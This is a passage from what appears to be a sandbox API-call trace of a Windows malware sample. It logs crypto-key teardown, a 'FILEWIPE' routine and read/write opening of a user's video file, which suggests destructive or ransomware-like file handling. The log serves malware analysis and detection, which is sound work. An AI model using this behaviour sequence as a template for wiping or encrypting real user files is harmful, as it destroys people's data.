lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.068] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.068] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0199.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.068] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.069] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0199.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.069] CryptDestroyKey (hKey=0x90af18) returned 1 [0199.069] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.069] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.069] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.069] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.069] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.070] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.070] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.070] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.070] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0199.070] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.070] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.070] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.070] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.070] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.070] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.070] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.070] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.071] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.071] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.071] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.071] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.071] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.071] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.071] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0199.071] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.071] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.071] FreeLibrary (hLibModule=0x74f20000) returned 1 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0199.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0199.071] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.072] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.072] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.072] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.072] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.073] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.073] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0199.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.073] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1642dec0, ftLastWriteTime.dwHighDateTime=0x1d5e11d, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AcJ9.swf", cAlternateFileName="")) returned 0x90ae18 [0199.074] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0199.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.074] CharLowerBuffW (in: lpsz="byte[95424]", cchLength=0xb | out: lpsz="byte[95424]") returned 0xb [0199.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.074] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.075] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.080] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.080] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.080] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0199.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0199.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0199.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.081] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.081] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.081] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.081] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.081] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.081] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.082] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.082] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\acj9.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.083] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.083] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.083] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.083] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 